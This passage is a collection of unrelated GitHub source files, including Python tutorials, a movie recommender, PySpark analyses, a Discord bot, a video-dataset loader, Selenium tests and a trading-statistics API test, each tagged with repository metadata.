1\n\nprint(area_of_circle(3))\nprint(sum(1, 100, func1))\nprint(sum(1, 100, func2))\n\nprint(abs(-100)) # 绝对值\nprint(max(99, 45, 54)) #返回最大值\nprint(int('1'))\nprint(float('1.32'))\nprint(str(1.32))\nprint(bool(1.32))\n\n# 空函数\ndef function():\n pass\n\n# def my_abs(x):\n# if x >= 0:\n# return x\n# else:\n# return -x\n# 两者错误不同\n# print(my_abs('A'))\n# print(abs('A'))\n\ndef my_abs(x):\n if not isinstance(x,(int, float)):\n raise TypeError('bad operand type')\n if x >= 0:\n return x\n else:\n return -x\n\n# print(my_abs('A'))\n# print(abs('A'))\n\nimport math\n\ndef move(x, y, step, angle = 0):\n nx = x + step * math.cos(angle)\n ny = y + step * math.sin(angle)\n return nx, ny\nx, y = move(100, 100, math.pi/6, 90)\nr = move(100, 100, math.pi/6, 90)\n# 返回多个值,其实是一个tuple\nprint(x, y)\nprint(r)","repo_name":"Htgs/pypypypy","sub_path":"lxf-8函数.py","file_name":"lxf-8函数.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20197473445","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.sparse import csr_matrix\n\nfrom recommender import Recommender\n\n\nclass KNNRecommender(Recommender):\n def __init__(self):\n # Data pre-processing\n self.movies = pd.read_csv(\"datasets/ml-latest-small/movies.csv\") \\\n .drop(\"genres\", axis=1)\n self.ratings = pd.read_csv(\"datasets/ml-latest-small/ratings.csv\") \\\n .drop(\"timestamp\", axis=1)\n\n pivot_table = self.ratings.pivot(index=\"movieId\", columns=\"userId\", values=\"rating\") \\\n .fillna(0)\n self.sparse_matrix = csr_matrix(pivot_table.values)\n\n # Model training\n self.model = NearestNeighbors(metric=\"cosine\", algorithm=\"brute\", n_neighbors=20) \\\n .fit(self.sparse_matrix)\n \n \n def recommend(self, ratings):\n recommendations = set()\n recommended_movies = []\n\n liked_movies = [movieId for movieId in ratings if ratings[movieId] > 3]\n\n for movie_id in liked_movies:\n if movie_id > self.movies['movieId'].unique().size:\n continue\n _, ids = self.model.kneighbors(self.sparse_matrix[movie_id], n_neighbors=5)\n recommendations.update(*(set(rec_id for rec_id in x if rec_id not in ratings) for x in ids))\n \n for movie_id in recommendations:\n temp = self.movies.loc[self.movies['movieId'] == movie_id, 'title']\n if not temp.empty:\n recommended_movies.append(temp.item())\n\n return recommended_movies, recommendations\n\n \n def getAccuracy(self):\n # for each user, get random sampling of movies and ratings\n # get recommendations 
\n\n    \n    def getAccuracy(self):\n        # for each user, get random sampling of movies and ratings\n        # get recommendations based on random sampling\n        # find user's average rating for the returned movies\n        for user in self.ratings['userId'].unique():\n            user_ratings = self.ratings.loc[self.ratings['userId'] == user].drop('userId', axis = 1)\n            user_ratings = user_ratings.sample(n=5)\n\n            user_dict = {}\n            for _, row in user_ratings.iterrows():\n                if(row['movieId'] >= 9724):\n                    continue\n                user_dict[row['movieId']] = row['rating']\n            \n            _, recommendations = self.recommend(user_dict)\n            \n            total = 0\n            for rec in recommendations:\n                temp = (user_ratings.loc[user_ratings['movieId'] == rec, 'rating'])\n                if temp.size != 0:\n                    total += temp.iloc[0]\n            \n            avg_rating = 0 if len(recommendations) == 0 else total/len(recommendations)\n\n            if(avg_rating != 0):\n                print(\"Average rating for user \" + str(user) + \": \" + str(avg_rating))\n\n\n# knn_rec1 = KNNRecommender()\n# knn_rec1.getAccuracy()\n# print(knn_rec1.sparse_matrix.shape)\n# print(knn_rec1.ratings['movieId'].unique().size)","repo_name":"bryantpark04/cds-freshman-project","sub_path":"knn_recommender.py","file_name":"knn_recommender.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"2171258890","text":"#!/usr/bin/env python3\r\n\r\n# display a welcome message\r\nprint(\"The Miles Per Gallon program\")\r\n\r\n\r\ncont = True\r\n\r\nwhile cont:\r\n    print()\r\n    # get input from the user\r\n    miles_driven = float(input(\"Enter miles driven: \"))\r\n    gallons_used = float(input(\"Enter gallons of gas used: \"))\r\n    cost_gallons = float(input(\"Enter cost per gallon: \"))\r\n\r\n    while miles_driven <= 0:\r\n        print()\r\n        miles_driven = float(input(\"Miles driven must be greater than zero. Please try again: \"))\r\n    while gallons_used <= 0:\r\n        print()\r\n        gallons_used = float(input(\"Gallons used must be greater than zero. Please try again: \"))\r\n    while cost_gallons <= 0:\r\n        print()\r\n        cost_gallons = float(input(\"Cost per gallon used must be greater than zero. Please try again: \"))\r\n\r\n    # calculate and display miles per gallon\r\n    print()\r\n    mpg = round(miles_driven / gallons_used, 2)\r\n    print(\"Miles Per Gallon: \", mpg)\r\n    total_cost = round(gallons_used * cost_gallons, 2)\r\n    print(\"Total Gas Cost: \", total_cost)\r\n    cost_mile = round(cost_gallons / mpg, 2)\r\n    print(\"Cost Per Mile: \", cost_mile)
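\r\n\r\n    # Editor's sketch (hypothetical helper, not in the original): the three\r\n    # validation loops above could share one function, e.g.\r\n    #   def get_positive_float(prompt, retry_msg):\r\n    #       value = float(input(prompt))\r\n    #       while value <= 0:\r\n    #           value = float(input(retry_msg))\r\n    #       return value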
\"))\r\n if answer == \"n\":\r\n cont = False\r\n\r\n\r\n\r\n\r\n","repo_name":"CWance/Murach","sub_path":"Python/pyt2_allfiles/exercises/ch03/mpg.py","file_name":"mpg.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"347737479","text":"import curseforge\nimport modrinth\nimport util\nfrom variables import *\n\n\ndef getModFile(modName):\n fileName, downloadUrl = curseforge.getModFile(modName)\n if fileName != None and downloadUrl != None:\n return fileName, downloadUrl\n\n util.log(modName + \" not found on curseforge, trying modrinth\")\n\n fileName, downloadUrl = modrinth.getModFile(modName)\n if fileName != None and downloadUrl != None:\n return fileName, downloadUrl\n\n util.log(modName + \" not found on curseforge or modrinth\")\n return None, None\n\n\ndef main():\n util.eraseFile(LOG_FILE)\n\n # backup mods\n modFolder = util.getFromConfig(\"modFolder\")\n util.moveFiles(modFolder, modFolder + \"backup/\")\n\n # download all mods\n for modName in util.getFromConfig(\"mods\"):\n fileName, downloadUrl = getModFile(modName)\n if fileName is None or downloadUrl is None:\n continue\n\n util.downloadFile(downloadUrl, \"mods/\" + fileName)\n\n # copy mods to mods folder\n util.copyFiles(\"mods/\", modFolder)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nrobinson12/mc-mod-downloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13314925639","text":"from tkinter import *\nfrom functools import partial\nimport random\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\n\nclass Start:\n\n def __init__(self,parent):\n\n self.o_start_frame = Frame(padx=10,bg=\"#D4E6F1\")\n self.o_start_frame.grid()\n\nclass Play:\n def __init__(self, parent):\n\n \n self.start_frame = Frame(padx=10,bg=\"#D4E6F1\")\n self.start_frame.grid()\n\n self.starting_funds = IntVar()\n\n self.mystery_box_label = Label(self.start_frame, text=\"Play...\",font=\"times 18 bold underline\",pady=20, padx=10,bg=\"#D4E6F1\")\n self.mystery_box_label.grid(row=1)\n\n self.instruction_start = Label(self.start_frame , text=\"Press Enter or click the 'Open Boxes' button to reveal the contents of the mystery boxes\",bg=\"#D4E6F1\",font=\"times 11\", justify=LEFT, wrap=250)\n self.instruction_start.grid(row=2,pady=5)\n\n self.funds_frame = Frame(self.start_frame, width=45, bg=\"#D4E6F1\")\n self.funds_frame.grid(row=5)\n\n self.amount_start = Label(self.funds_frame , text=\"Welcome, your starting balance is {}\",bg=\"#D4E6F1\",font=\"times 12 bold\", justify=LEFT)\n self.amount_start.grid(row=0,pady=5)\n\n self.button_frame = Frame(self.start_frame, width=45, bg=\"#D4E6F1\")\n self.button_frame.grid(row=6,pady=10)\n\n self.instruction = Button(self.button_frame, text=\"How to play\",font=\"times 12 bold\")\n self.instruction.grid(row=1, column=1,pady=20)\n\n self.stats = Button(self.button_frame, text=\"Game Stats...\",font=\"times 12 bold\")\n self.stats.grid(row=1, column=2,pady=20)\n\n self.add_funds = Button(self.start_frame , width=15, text=\"Open Boxes\",font=\"times 16 bold\")\n self.add_funds.grid(row=4,column=0,pady=10)\n\n\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Mystery Box Game\")\n something = Start(root)\n 
root.mainloop()","repo_name":"kuschelyoungl71929/02_Mystery_Box_es","sub_path":"play_gui_v1.py","file_name":"play_gui_v1.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16352035131","text":"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructField, StructType, StringType, LongType\nfrom dataframeOperations import FlightOperations\nfrom dataframeOperations import BikeOperations\nfrom util.df_logger import get_logger\n\nif __name__ == \"__main__\":\n try:\n logger = get_logger(__name__)\n\n spark = SparkSession.builder.appName(\"DataframeOperations\").getOrCreate()\n if spark:\n logger.info(\"Spark session has created\")\n manualSchema = StructType([StructField(\"DEST_COUNTRY_NAME\", StringType(), True),\n StructField(\"ORIGIN_COUNTRY_NAME\", StringType(), True),\n StructField(\"count\", LongType(), False, metadata={\"hello\": \"world\"})])\n flightoperations = FlightOperations(\n spark, \"E:\\\\Spark\\\\Working\\\\data\\\\flight-data\\\\json\", manualSchema)\n bike_operations = BikeOperations(spark, \"E:\\\\Spark\\\\Working\\\\data\\\\bike-data\")\n\n # Convert Spark DF into python list\n origin_country = 'india'.title()\n destination_df = flightoperations.get_destinations(origin_country)\n if len(destination_df.head(1)) > 0:\n dest_list = [dest.DEST_COUNTRY_NAME for dest in destination_df.collect()]\n logger.info(f\"Extracted the filghts available from {origin_country}\")\n logger.info(dest_list)\n else:\n logger.warn(\"No flight is available from \" + origin_country)\n\n # Save Spark DF into a JSON file\n logger.info(\"Checking flights to India...\")\n origin_df = flightoperations.get_origins('india'.title())\n if len(origin_df.head(1)) > 0:\n logger.info(\"Writing the output file to E:\\\\Spark\\\\project1\\\\origin.json\")\n origin_df.repartition(1).write.format('json').save(\n \"E:\\\\Spark\\\\project1\\\\origin.json\", mode=\"Overwrite\")\n else:\n logger.warn(\"No flight has found\")\n\n # Convert Spark DF into python int\n logger.info(\"Checking total number of countries which have flights to India...\")\n logger.info(flightoperations.get_flight_origin_count('India'))\n\n # To get aggregated sum of the result\n logger.info(\n f\"Checking total number of flights between {'united states'.title()} and {'australia'.title()}\")\n result = flightoperations.get_no_of_flights(\n 'united states'.title(), 'australia'.title())\n if result:\n logger.info(result)\n else:\n logger.warn(\"No flight service\")\n\n # Fetch the busiest start terminal\n logger.info(\"Checking for the most busiest journey begin place\")\n busy_st_df = bike_operations.get_busiest_start_terminal()\n logger.info(busy_st_df.take(1))\n\n # Fetch the busiest end terminal\n logger.info(\"Checking for the most busiest journey end place\")\n busy_end_df = bike_operations.get_busiest_end_terminal()\n logger.info(busy_end_df.take(1))\n\n # Get number of trips between start and end locations\n no_trips = bike_operations.get_no_trips(\"Harry Bridges Plaza (Ferry Building)\",\n \"San Francisco Caltrain (Townsend at 4th)\")\n logger.info(\n f\"Total number of trips between Harry Bridges Plaza (Ferry Building) and San Francisco Caltrain (Townsend at 4th) is {no_trips}\")\n\n # Get total number of available bikes\n no_bikes = bike_operations.get_no_bikes()\n logger.info(f\"Total of number of bikes available is {no_bikes}\")\n\n # Predict the number of trips in a day\n predicted_count = 
bike_operations.predict_no_trips(\"FRIDAY\")\n logger.info(f\"Predicted trips count for Friday is {predicted_count}\")\n\n # Calculate fare for a trips\n fare = bike_operations.get_fare_by_time(913459)\n logger.info(f\"Calculated fare for the trip id:913459 is {fare}\")\n\n # Estimate fare between places\n fare = bike_operations.get_fare_by_distance(\n \"San Antonio Shopping Center\", \"Paseo de San Antonio\")\n logger.info(\n f\"Estimated fare between San Antonio Shopping Center and Paseo de San Antonio is {fare}\")\n\n # Update the station details in a table\n bike_operations.store_station_details(\"station_details\")\n\n except Exception as error:\n logger.exception(f\"Something went wrong here {error}\")\n else:\n logger.info(\"Dataframe operations have completed\")\n finally:\n spark.stop()\n","repo_name":"SathishRM/Pyspark","sub_path":"DataframeOperations/src/dataframeClient.py","file_name":"dataframeClient.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"42688003995","text":"import discord\nimport logging\nimport random\nfrom discord import Game\nfrom discord.ext import commands\nfrom tamago import VERSION\nfrom tamago.lib import utils\n\nLOG = logging.getLogger(__name__)\n\nclass Server(commands.Cog):\n def __init__(self, tamago):\n self.tamago = tamago\n\n async def on_ready(self):\n await self.tamago.change_presence(status=discord.Status.idle, activity=Game(name='Waking up, making coffee...'))\n LOG.info('Logged in as {}'.format(self.tamago.user.name))\n self.tamago.loop.create_task(utils.change_status(self.tamago))\n self.tamago.loop.create_task(utils.list_servers(self.tamago))\n\n async def on_command_error(self, ctx, error):\n if isinstance(error, commands.CommandInvokeError):\n LOG.error(error)\n msg = '{} Error running the command'.format(ctx.message.author.mention)\n if isinstance(error, commands.CommandNotFound):\n msg = '{} the command you ran does not exist please use !help for assistance'.format(ctx.message.author.mention)\n if isinstance(error, commands.CheckFailure):\n msg = ':octagonal_sign: you do not have permission to run this command, {}'.format(ctx.message.author.mention)\n if isinstance(error, commands.MissingRequiredArgument):\n msg = 'Missing required argument: ```{}```'.format(error)\n\n if not msg:\n msg = 'Oh no, I have no idea what I am doing! {}'.format(error)\n\n\n await ctx.send('{}'.format(msg))\n\n @commands.command()\n async def tamago(self, ctx):\n embed = discord.Embed(\n title = 'Tamago Bot',\n description = 'Tamago Bot information',\n colour = discord.Colour.gold()\n )\n\n tamago_avatar = [\n 'https://i.imgur.com/NtDueT7.png',\n 'https://i.imgur.com/pzwv3Gs.png',\n 'https://i.imgur.com/khPDnT2.png',\n 'https://i.imgur.com/GEJjUD3.png',\n 'https://i.imgur.com/e4EyhfI.png',\n ]\n\n embed.set_author(name='Benidct Tamago')\n embed.set_thumbnail(url=random.choice(tamago_avatar))\n embed.add_field(name='description', value=f'Tamago is a WIP, add Tamago to your server! 
[add me]( https://discordapp.com/oauth2/authorize?client_id={self.tamago.app_id}&scope=bot)', inline=True)\n embed.add_field(name='Version', value=VERSION, inline=True)\n\n await ctx.send(embed=embed)\n\ndef setup(tamago):\n tamago.add_cog(Server(tamago))\n","repo_name":"hhollenstain/tamago","sub_path":"tamago/lib/plugins/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"37176710479","text":"import streamlit as st\n\nfrom tickers.download.config import set_yf_period\n\n\ndef download_button(scope):\n\n\tdownload_button_msg = 'Download Prior ' + str(int(scope.download['days'])) + ' day'\n\n\tif scope.download['days'] > 1: \n\t\tdownload_button_msg += 's'\n\n\treturn st.button(download_button_msg)\n\n\t\ndef edit_download_days(scope):\n\n\tprevious_selection = int(scope.download['days'])\n\tdisplay_name = 'Days to Download (recent)'\n\twidget_key = 'widget_download_days'\n\n\tst.sidebar.number_input( \t\n\t\t\t\t\t\t\tlabel\t\t=display_name, \n\t\t\t\t\t\t\tmin_value\t=7, \n\t\t\t\t\t\t\tvalue\t\t=previous_selection,\n\t\t\t\t\t\t\ton_change\t=on_change_download_days,\n\t\t\t\t\t\t\targs\t\t=(scope, widget_key, ),\n\t\t\t\t\t\t\tkey\t\t\t=widget_key,\n\t\t\t\t\t\t\t) \n\n\ndef on_change_download_days(scope:dict, widget_key:str):\n\n\tchanged_value = scope[widget_key]\n\n\t# store the selection\n\tscope.download['days'] = changed_value\n\n\t# update the yf download days\n\tset_yf_period(scope)\n\n","repo_name":"RobHay67/share_screener","sub_path":"widgets/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31754307930","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef main(filename):\n data = pd.read_csv(filename, header=None)\n means = data.mean(axis = 0)\n stds = data.std(axis = 0)\n return means[0], means[1], stds[0], stds[1]\n\nif __name__ == '__main__':\n files_http1 = ['./results/benchmark_size/http1_num_1_txt3.csv', './results/benchmark_size/http1_num_5_txt3.csv', './results/benchmark_size/http1_num_25_txt3.csv', './results/benchmark_size/http1_num_50_txt3.csv', './results/benchmark_size/http1_num_100_txt3.csv', './results/benchmark_size/http1_num_500_txt3.csv']\n files_http2 = ['./results/benchmark_size/http2_num_1_txt3.csv', './results/benchmark_size/http2_num_5_txt3.csv', './results/benchmark_size/http2_num_25_txt3.csv', './results/benchmark_size/http2_num_50_txt3.csv', './results/benchmark_size/http2_num_100_txt3.csv', './results/benchmark_size/http2_num_500_txt3.csv']\n\n time_tot_http2, time_contentTransfer_http2 = [], []\n std_tot_http2, std_contentTransfer_http2 = [], []\n \n time_tot_http1, time_contentTransfer_http1 = [], []\n std_tot_http1, std_contentTransfer_http1 = [], []\n\n for f in files_http2:\n t1, t2, std1, std2 = main(f)\n # time_contentTransfer_http2.append(t1)\n time_tot_http2.append(t2)\n\n # std_contentTransfer_http2.append(2*std1)\n std_tot_http2.append(2*std2)\n\n for f in files_http1:\n t1, t2, std1, std2 = main(f)\n # time_contentTransfer_http1.append(t1)\n time_tot_http1.append(t2)\n\n # std_contentTransfer_http1.append(2*std1)\n std_tot_http1.append(2*std2)\n\n x = [1, 5, 25, 50, 100, 500]\n time_tot_http2 = np.array(time_tot_http2)\n std_tot_http2 = np.array(std_tot_http2)\n time_tot_http1 = np.array(time_tot_http1)\n std_tot_http1 = 
np.array(std_tot_http1)\n\n fig, ax = plt.subplots() \n ax.grid()\n ax.plot(x, time_tot_http1, 'o-', color='r', label=\"HTTP1\")\n ax.plot(x, time_tot_http2, 'o-', color='g', label=\"SPDY\")\n\n ax.fill_between(x, time_tot_http1 - std_tot_http1, time_tot_http1 + std_tot_http1, color='gray', alpha=0.3)\n ax.fill_between(x, time_tot_http2 - std_tot_http2, time_tot_http2 + std_tot_http2, color='gray', alpha=0.3)\n # ax.errorbar(x, time_tot_http2, yerr=std_tot_http2, fmt='-', color='r', label=\"HTTP2\")\n # ax.errorbar(x, time_tot_quic, yerr=std_tot_quic, fmt='-', color='b', label=\"QUIC\")\n ax.set_xlabel('Number of times data sent')\n ax.set_ylabel('Time (in ms)')\n ax.legend()\n # ax.set_xscale('log')\n ax.set_title('Comparison of Total Time with Multiple Transfer')\n fig.savefig('results/plots/total_time_multi_data_transfer.png', dpi=fig.dpi)","repo_name":"khushhallchandra/CN-project","sub_path":"analyze_n_transfer.py","file_name":"analyze_n_transfer.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73674399516","text":"from .pages.main_page import MainPage\nfrom .pages.search_page import SearchPage\n\n\ndef test_MainPage_has_cur_date_link(driver, app_root_url):\n ''' Checks if MainPage has current date link '''\n main_page = MainPage(driver, app_root_url)\n main_page.open()\n\n assert main_page.has_cur_date_link(), 'Current date link is not present'\n\n\ndef test_user_can_go_to_SearchPage(driver, app_root_url):\n ''' Checks if user can go from MainPage to SearchPage '''\n main_page = MainPage(driver, app_root_url)\n main_page.open()\n\n main_page.to_search_page()\n search_page = SearchPage(driver, driver.current_url)\n\n assert search_page.url == f'{app_root_url}/search/', \"Link doesn't lead to SearchPage\"\n","repo_name":"dreamer20/pc_status","sub_path":"tests/e2e/test_MainPage.py","file_name":"test_MainPage.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27446028217","text":"import os\nimport glob\nimport torch\nimport pandas as pd\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport torchaudio.transforms as audio_transforms\nfrom torch.utils.data import Dataset\nfrom torchvision.io import read_video\nfrom transformers import CLIPProcessor, CLIPModel\nimport re\n\n\ndef split_camel_case(s):\n return re.sub(r'(?<=[a-z])(?=[A-Z])', ' ', s)\n\n# def prepare_labels(class_file):\n# with open(class_file, 'r') as f:\n# class_labels = [line.strip() for line in f.readlines()]\n\n# return {int(label.split()[0]): f\"a video of {split_camel_case(' '.join(label.split()[1:]))}\" for label in class_labels}\n\nclass BaseCLIPModel:\n def __init__(self, model_name='openai/clip-vit-base-patch32'):\n self.processor = CLIPProcessor.from_pretrained(model_name)\n self.model = CLIPModel.from_pretrained(model_name)\n self.model = self.model.eval()\n\nclass ThumosDataset(Dataset):\n def __init__(self, root_dir, split='train', transform=None, audio_transform=None, model_name='openai/clip-vit-base-patch32', downsample_factor=16):\n assert split in ['train', 'val', 'test'], \"split must be 'train', 'val', or 'test'\" \n self.processor = CLIPProcessor.from_pretrained(model_name) \n self.root_dir = root_dir\n self.split = split\n self.transform = transform\n self.audio_transform = audio_transform\n \n # self.video_files = sorted(glob.glob(os.path.join(root_dir, split, ext)))\n 
self.data = pd.read_csv(f\"{root_dir}/{split}/thumos_{split}.csv\")\n self.downsample = downsample_factor\n \n # class_labels_file = os.path.join(root_dir, 'classes.txt')\n # self.class_file = prepare_labels(class_labels_file)\n \n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n # Load video frames and audio\n video_path = self.data.loc[idx, 'video_path']\n label = self.data.loc[idx, 'label']\n if self.split in [\"test\", \"val\"]:\n start_action = self.data.loc[idx, 'start_action']\n end_action = self.data.loc[idx, 'end_action']\n else:\n start_action = [0]\n end_action = [0]\n video_frames, audio_waveform, framerate = read_video(video_path, pts_unit='sec', output_format=\"TCHW\")\n frame_rate = framerate[\"video_fps\"]\n audio_fps = framerate[\"audio_fps\"]\n video_frames = video_frames[::self.downsample, :, :, :]\n \n \n # # Preprocess video frames\n # if self.transform:\n # video_frames = torch.stack([self.transform(frame) for frame in video_frames])\n\n # Preprocess audio\n if audio_waveform.size(1) == 0:\n # Create an empty waveform with desired shape, e.g., (1, 1)\n audio_waveform = torch.zeros(2, 100000)\n # else:\n # # audio_waveform = self.audio_transform(audio_waveform)\n # audio_waveform = audio_transforms.SlidingWindow(duration=3, overlap=1)(audio_waveform)\n # print(audio_waveform.shape)\n \n\n # Load temporal labels\n start_action = start_action.strip(\"[]\").split()\n end_action = end_action.strip(\"[]\").split()\n start_action = [float(n) for n in start_action]\n end_action = [float(n) for n in end_action]\n start_action = torch.tensor(start_action, dtype=torch.float)\n end_action = torch.tensor(end_action, dtype=torch.float)\n \n # frame_rate = frame_rate / self.downsample # Adjust the frame rate according to the downsampled video frames\n # start_frame_indices = (start_action * frame_rate).round().long()\n # end_frame_indices = (end_action * frame_rate).round().long()\n \n\n # Get text embeddings\n # prompt = get_text_embedding(self.class_file[label], self.processor)\n video_frames = get_image_embedding(video_frames, self.processor)\n label = torch.tensor(label).long()\n return video_path, video_frames, audio_waveform, (start_action, end_action, label)\n \ndef collate_fn(batch):\n # Sort the batch in the descending order\n sorted_batch = sorted(batch, key=lambda x: x[1].shape[1], reverse=True)\n\n # Separate video frames, audio, and ground truths\n video_path, sequences, audios, ground_truths = zip(*sorted_batch)\n\n # Get sequence lengths\n lengths = [len(seq) for seq in sequences]\n # prompts = [p.squeeze() for p in prompts]\n\n # Padding\n padded_sequences = torch.nn.utils.rnn.pad_sequence([seq for seq in sequences], batch_first=True)\n # padded_audios = pad_audio(audios)\n\n # Unzip the ground truths\n start_frame_indices, end_frame_indices, action_classes = zip(*ground_truths)\n \n start_frame_indices = torch.nn.utils.rnn.pad_sequence(start_frame_indices, batch_first=True, padding_value=0)\n end_frame_indices = torch.nn.utils.rnn.pad_sequence(end_frame_indices, batch_first=True, padding_value=0)\n # max_length = max([prompt.size(1) for prompt in prompts])\n # prompts = torch.nn.utils.rnn.pad_sequence([torch.cat([prompt, torch.zeros((1, max_length - prompt.size(1)))], dim=1) for prompt in prompts], batch_first=True)\n # prompts = prompts.long()\n action_classes = torch.stack(action_classes)\n\n # Convert to tensors\n # start_frame_indices = torch.stack(start_frame_indices)\n # end_frame_indices = torch.stack(end_frame_indices)\n # 
action_classes = torch.stack(action_classes)\n\n    return video_path, padded_sequences, None, (start_frame_indices, end_frame_indices, action_classes)\n\n\ndef get_thumos_dataloader(root_dir, split='train', batch_size=1, num_workers=1, downsample=16):\n    transform = transforms.Compose([\n        transforms.Resize((224, 224), antialias=True),\n        transforms.ConvertImageDtype(torch.float32),\n        transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n    ])\n\n    audio_transform = audio_transforms.MelSpectrogram(sample_rate=16000, n_mels=64, n_fft=800)    \n    thumos_dataset = ThumosDataset(root_dir, split=split, transform=transform, audio_transform=audio_transform, downsample_factor=downsample)\n    dataloader = torch.utils.data.DataLoader(thumos_dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers, collate_fn=collate_fn)\n    return dataloader\n    \ndef get_image_embedding(images, clippy, use_tensor=True):\n    inputs = clippy(images=images, return_tensors=\"pt\", padding=True)\n    return inputs['pixel_values']\n\ndef get_text_embedding(texts, clippy, use_tensor=True):\n    inputs = clippy(text=texts, return_tensors=\"pt\", padding=True)\n    return inputs['input_ids']\n\n","repo_name":"ed-fish/mm-ZSTAD","sub_path":"src/utils/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"}
{"seq_id":"29970367260","text":"from rest_framework import serializers\nfrom dialer_campaign.models import Subscriber\n\n\nclass SubscriberListSerializer(serializers.HyperlinkedModelSerializer):\n\n    \"\"\"\n    **Read**:\n\n        CURL Usage::\n\n            curl -u username:password -H 'Accept: application/json' http://localhost:8000/rest-api/subscriber-list/\n\n        Response::\n\n            [\n                {\n                    \"id\": 1,\n                    \"contact\": \"/rest-api/contact/11/\",\n                    \"campaign\": \"/rest-api/campaigns/3/\",\n                    \"last_attempt\": null,\n                    \"count_attempt\": 0,\n                    \"completion_count_attempt\": 0,\n                    \"duplicate_contact\": \"34235464\",\n                    \"status\": 1\n                },\n                {\n                    \"id\": 2,\n                    \"contact\": \"/rest-api/contact/12/\",\n                    \"campaign\": \"/rest-api/campaigns/3/\",\n                    \"last_attempt\": null,\n                    \"count_attempt\": 0,\n                    \"completion_count_attempt\": 0,\n                    \"duplicate_contact\": \"34235464\",\n                    \"status\": 1\n                }\n            ]\n    \"\"\"\n    class Meta:\n        model = Subscriber\n        fields = (\n            'url', 'contact', 'campaign', 'last_attempt', 'count_attempt',\n            'completion_count_attempt', 'status', 'created_date', 'updated_date',\n        )\n","repo_name":"newfies-dialer/newfies-dialer","sub_path":"newfies/apirest/subscriber_list_serializers.py","file_name":"subscriber_list_serializers.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"50"}
{"seq_id":"22016723244","text":"#========================================================\r\n#+++++++++++++++++ Test Case Info ++++++++++++++++\r\n# Case ID: FM_getHomeFollower\r\n# Case title: Get the follower revenue info on the home page\r\n# Preconditions: \r\n# Test steps:\r\n#   1. Get the follower revenue info on the home page without logging in\r\n# Expected results:\r\n#   1. Check that the response code is 200\r\n# Script author: shencanhui\r\n# Date written: 20171211\r\n#=========================================================\r\nimport sys,unittest,json\r\nsys.path.append(\"../../lib/common\")\r\nsys.path.append(\"../../lib/webAPI\")\r\nsys.path.append(\"../../lib/statistic\")\r\nimport Auth,FMCommon,Common,PersonalPage,Statistic\r\nfrom socketIO_client import SocketIO\r\nfrom base64 import b64encode\r\nfrom prettytable import PrettyTable\r\n\r\nwebAPIData = FMCommon.loadWebAPIYML()\r\nauthData = 
FMCommon.loadAuthYML()\r\npersonalPageData = FMCommon.loadPersonalPageYML()\r\ncommonData = FMCommon.loadCommonYML()\r\nstatisticData = FMCommon.loadStatisticYML()\r\n\r\nclass StatisticsOfTrader(unittest.TestCase):\r\n    def setUp(self):\r\n        '''Log in to the followme system'''\r\n        pass\r\n\r\n    def test_1_getStatisticsOfTrader(self):\r\n        '''Get the user's list of trading accounts'''\r\n        userID = \"148174\"\r\n        accountIndex = \"2\"\r\n        url = webAPIData['hostName']+personalPageData['getStatisticsOfTrader_url1'] + userID+'_'+accountIndex+ personalPageData['getStatisticsOfTrader_url2']\r\n        statsticData=PersonalPage.getStatisticsOfTrader(url,headers=webAPIData['headers'],printLogs=1)\r\n        # A successful request returns 200\r\n        self.assertEqual(statsticData.status_code,webAPIData['status_code_200'])\r\n        statistic = json.loads(statsticData.text)[\"data\"]\r\n        mt4Account = Statistic.getMt4Account(userID=userID,accountIndex=accountIndex)\r\n        BrokerId = Statistic.BrokerId(userID=userID,accountIndex=accountIndex)\r\n\r\n        factorProfitEquity = Statistic.factorProfitEquity(mt4Account=mt4Account,brokerID=BrokerId)\r\n        rateProfit = Statistic.rateProfit(mt4Account=mt4Account,brokerID=BrokerId)\r\n        moneyFollowSum = Statistic.moneyFollowSum(mt4Account=mt4Account,brokerID=BrokerId)\r\n        profitFollowSum = Statistic.profitFollowSum(mt4Account=mt4Account,brokerID=BrokerId)\r\n        # Get the equity profit factor, the total amount currently being followed and the total follow profit\r\n        topTable = PrettyTable([\"预期/实际\",\"userID\",\"accountIndex\",\"净值利润因子\",\"收益率\",\"正在跟随总额\",\"跟随获利总额\"])\r\n        